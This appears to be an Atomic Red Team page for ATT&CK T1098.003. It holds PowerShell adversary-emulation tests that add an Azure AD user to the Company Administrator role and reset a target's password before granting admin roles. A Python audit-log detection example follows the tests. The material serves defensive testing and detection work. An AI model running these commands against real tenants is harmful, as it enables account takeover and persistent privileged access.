T1098.003
Account Manipulation: Additional Cloud Roles
Description from ATT&CK
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles)
This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in Azure AD environments, an adversary with the Application Administrator role can add Additional Cloud Credentials to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD)
Atomic Tests
Atomic Test #1 - Azure AD - Add Company Administrator Role to a user
Add an existing Azure AD user account to the Company Administrator role.
Supported Platforms: azure-ad
auto_generated_guid: 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | Azure AD username | string | jonh@contoso.com |
password | Azure AD password | string | p4sswd |
target_user | Name of the user who will be assigned the Company Admin role | string | default |
Attack Commands: Run with powershell!
```powershell
Import-Module MSOnline
# Build a credential object from the test inputs and sign in to the tenant
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-MsolService -Credential $Credential
# Assign the target user to the Company Administrator (Global Administrator) role
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
```
Cleanup Commands:
```powershell
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
```
Dependencies: Run with powershell!
Description: MSOnline module must be installed.
Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name MSOnline -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
```
Get Prereq Commands:
```powershell
Install-Module -Name MSOnline -Force
```
Atomic Test #2 - Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
This test simulates the adversary activity described in the following blog post: resetting the password of a normal user and then adding that user to the Company Administrator role within M365. Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
Supported Platforms: azure-ad
auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
auth_username | Azure AD username used to conduct the adversary activity | string | jonh@contoso.com |
auth_password | Azure AD password for user auth_username | string | p4sswd |
target_user | Name of the user whose password will be reset and who will be added to the admin role | string | default |
target_password | The password that the user target_user will be reset to | string | Ohn05GeMe#$ |
Attack Commands: Run with powershell!
```powershell
Import-Module MSOnline
Import-Module AzureAD
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
$targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
# Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -Filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
# Reset the password of the target_user
Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
# Adding target_user to the Company Administrator and Global Reader roles
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
```
Cleanup Commands:
```powershell
Import-Module MSOnline
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-MsolService -Credential $credential
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
```
Dependencies: Run with powershell!
Description: MSOnline and AzureAD modules must be installed.
Check Prereq Commands:
```powershell
$required_mods = 'AzureAD', 'MSOnline'
$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)
$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
if ($notInstalled) {
    # Report the missing modules so the Get Prereq step can install them.
    Write-Output "The following PS modules aren't currently installed:"
    $notInstalled
    exit 1
}
else {
    Write-Output "All required PS modules are installed"
    exit 0
}
```
Get Prereq Commands:
```powershell
Install-Module -Name MSOnline -Scope CurrentUser -Force
Install-Module -Name AzureAD -Scope CurrentUser -Force
```
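Both tests above leave a clear trail in the Azure AD audit log: an "Add member to role" event for a privileged role (Test #1), and in Test #2 a "Reset user password" event on the same target shortly before it. The following detection logic is an added example, not part of the Atomic Red Team project; the sample entries are constructed, and the flattened `target`/`role` fields are an assumed simplification of the real `targetResources`/`modifiedProperties` structure.

```python
from datetime import datetime, timedelta

# Roles whose assignment should always be reviewed. "Company Administrator" is
# the legacy MSOnline name that the tests above assign; the portal shows it as
# "Global Administrator".
PRIVILEGED_ROLES = {"Company Administrator", "Global Administrator",
                    "Privileged Role Administrator", "Application Administrator"}

# Constructed sample audit entries in a simplified shape (assumption: real
# entries nest the target user and role under targetResources).
SAMPLE_AUDIT = [
    {"activityDateTime": "2023-05-01T09:00:00Z", "activityDisplayName": "Reset user password",
     "initiatedBy": "jonh@contoso.com", "target": "alice@contoso.com", "role": None},
    {"activityDateTime": "2023-05-01T09:02:10Z", "activityDisplayName": "Add member to role",
     "initiatedBy": "jonh@contoso.com", "target": "alice@contoso.com", "role": "Company Administrator"},
    {"activityDateTime": "2023-05-01T09:02:12Z", "activityDisplayName": "Add member to role",
     "initiatedBy": "jonh@contoso.com", "target": "alice@contoso.com", "role": "Global Reader"},
    {"activityDateTime": "2023-05-02T14:00:00Z", "activityDisplayName": "Add member to role",
     "initiatedBy": "helpdesk@contoso.com", "target": "bob@contoso.com", "role": "Company Administrator"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def find_privileged_role_adds(events):
    """Every assignment of a privileged directory role (the Test #1 pattern)."""
    return [e for e in events
            if e["activityDisplayName"] == "Add member to role" and e["role"] in PRIVILEGED_ROLES]

def find_reset_then_admin(events, window=timedelta(minutes=10)):
    """Password reset followed, within `window`, by a privileged role grant for the
    same user: the BEC persistence sequence simulated by Test #2."""
    resets = [e for e in events if e["activityDisplayName"] == "Reset user password"]
    hits = []
    for add in find_privileged_role_adds(events):
        for r in resets:
            delta = _ts(add["activityDateTime"]) - _ts(r["activityDateTime"])
            if r["target"] == add["target"] and timedelta(0) <= delta <= window:
                hits.append({"target": add["target"], "actor": add["initiatedBy"],
                             "role": add["role"], "seconds_after_reset": int(delta.total_seconds())})
    return hits

if __name__ == "__main__":
    for hit in find_reset_then_admin(SAMPLE_AUDIT):
        print(hit)
```

The "Global Reader" grant is deliberately not in the privileged set, so only the Company Administrator assignment fires; the unrelated helpdesk grant to bob shows up in the role-add list but not in the reset-then-admin correlation.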